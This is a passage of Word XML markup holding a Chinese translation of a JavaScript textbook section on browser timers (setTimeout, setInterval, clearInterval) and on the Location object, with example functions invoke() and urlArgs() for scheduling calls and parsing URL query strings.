      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:t>秒调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>updateClock()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>也返回一个值，这个值可以传递给</w:t>
      </w:r>
      <w:r>
        <w:t>clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>，用于取消后续函数的调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-1</w:t>
      </w:r>
      <w:r>
        <w:t>定义的应用函数会在等待指定的时间之后，开始重复调用某个函数，然后又过了一段时间之后取消函数调用。该例子演示了</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>etInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>的用法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-1</w:t>
      </w:r>
      <w:r>
        <w:t>：定时器应用函数</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安排函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>在未来的调用模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在等待了若干毫秒之后调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:t>并没有设置</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则对</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>调用将不会停止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有设置</w:t>
      </w:r>
      <w:r>
        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>，只在若干毫秒后调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>一次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>只有指定了</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，才会从</w:t>
      </w:r>
      <w:r>
        <w:t>start=0</w:t>
      </w:r>
      <w:r>
        <w:t>的时刻开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>注意，调用</w:t>
      </w:r>
      <w:r>
        <w:t>invoke()</w:t>
      </w:r>
      <w:r>
        <w:t>不会阻塞，它会立即返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function invoke(f,start,interval,end){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!start)start=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>默认设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=2)//</w:t>
      </w:r>
      <w:r>
        <w:t>单次调用模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(f,start);//</w:t>
      </w:r>
      <w:r>
        <w:t>若干毫秒后的单次调用模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>多次调用模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(repeat,start);//</w:t>
      </w:r>
      <w:r>
        <w:t>在若干毫秒后调用</w:t>
      </w:r>
      <w:r>
        <w:t>repeat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function repeat(){//</w:t>
      </w:r>
      <w:r>
        <w:t>在上一行所示的</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>中调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var h=setInterval(f,interval);//</w:t>
      </w:r>
      <w:r>
        <w:t>循环调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后停止调用，前提是</w:t>
      </w:r>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>已经定义了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(end)setTimeout(function(){clearInterval(h);},end);</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由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数可以作为字符串传入。如果这么做，那这个字符串会在指定的超时时间或间隔之后进行求值（相当于执行</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>）。除前两个参数之外，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范（除</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外的所有浏览器）还允许</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>传入额外的参数，并在调用函数时把这些参数传递过去。然而，如果需要支持</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的话，就不要应用此特性了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果以</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒的超时时间来调用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>，那么指定的函数不会立刻执行。相反，会把它放到队列中，等到</w:t>
      </w:r>
      <w:r>
        <w:t>前面处于等待状态的事件处理程序全部执行完成后，再</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>立即</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>调用它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="14_2_Liu_Lan_Qi_Ding_Wei_He_Dao_Hang_"/>
      <w:r>
        <w:t>14.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　浏览器定位和导航</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它表示该窗口中当前显示的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，并定义了方法来使窗口载入新的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性也引用到</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.location===document.location//</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象也有一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>属性，是文档首次载入后保存该文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的静态字符串。如果定位到文</w:t>
      </w:r>
      <w:r>
        <w:t>档中的片段标识符（如</w:t>
      </w:r>
      <w:r>
        <w:t>#table-of-contents</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象会做相应的更新，而</w:t>
      </w:r>
      <w:r>
        <w:t>document.URL</w:t>
      </w:r>
      <w:r>
        <w:t>属性却不会改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="338" w:name="14_2_1_Jie_Xi_URL"/>
      <w:r>
        <w:t>14.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　解析</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="338"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它表示该窗口中当前显示的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个字符串，后者包含</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的完整文本。</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，因此在会隐式调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>location.hre</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个对象的其他属性</w:t>
      </w:r>
      <w:r>
        <w:t>——protocol</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>pathname</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:t>，分别表示</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的各个部分。它们称为</w:t>
      </w:r>
      <w:r>
        <w:t>“URL</w:t>
      </w:r>
      <w:r>
        <w:t>分解</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>属性，同时被</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>对象（通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素创建）支持。参阅本书第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>项获取详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>属性比较有趣。如果有的话，</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性返回</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>片段标识符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>部分。</w:t>
      </w:r>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>属性也类似，它返回的是问号之后的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，这部分通常是某种类型的查询字符串。一</w:t>
      </w:r>
      <w:r>
        <w:t>般来说，这部分内容是用来参数化</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>并在其中嵌入参数的。虽</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>然这些参数通常用于运行在服务器上的脚本，但在启用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的页面中当然也可以使用它们。例</w:t>
      </w:r>
      <w:r>
        <w:t>14-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个通用函数</w:t>
      </w:r>
      <w:r>
        <w:t>urlArgs()</w:t>
      </w:r>
      <w:r>
        <w:t>的定义，可以用这个函数将参数从</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>属性中提取出来。该例子用到了</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>，后者是在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义的全局函数。（参见本书第三部分中的</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>获取详细内容。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-2</w:t>
      </w:r>
      <w:r>
        <w:t>：提取</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的搜索字符串中的参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数用来解析来自</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的查询串中</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>name=value</w:t>
      </w:r>
      <w:r>
        <w:t>参数对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它将</w:t>
      </w:r>
      <w:r>
        <w:t>name=value</w:t>
      </w:r>
      <w:r>
        <w:t>对存储在一个对象的属性中，并返回该对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这样来使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*var args=urlArgs();//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中解析参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*var q=args.q||"";//</w:t>
      </w:r>
      <w:r>
        <w:t>如果参数定义了的话就使用参数；否则使用一个默认值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*var n=args.n?parseInt(args.n):10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function urlArgs(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args={};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>query=location.search.substring(1);//</w:t>
      </w:r>
      <w:r>
        <w:t>查找到查询串，并去掉</w:t>
      </w:r>
      <w:r>
        <w:t>'?'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pairs=query.split("</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>符号将查询字符串分隔开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>pairs.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>对于每个片段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pos=pairs[i].indexOf('=');//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>"name=value"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos==-1)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有找到的话，就跳过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=pairs[i].substring(0,pos);/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>提取</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=pairs[i].substring(pos+1);//</w:t>
      </w:r>
      <w:r>
        <w:t>提取</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=decodeURIComponent(value);//</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>进行解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>args[name]=value;//</w:t>
      </w:r>
      <w:r>
        <w:t>存储为属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return args;//</w:t>
      </w:r>
      <w:r>
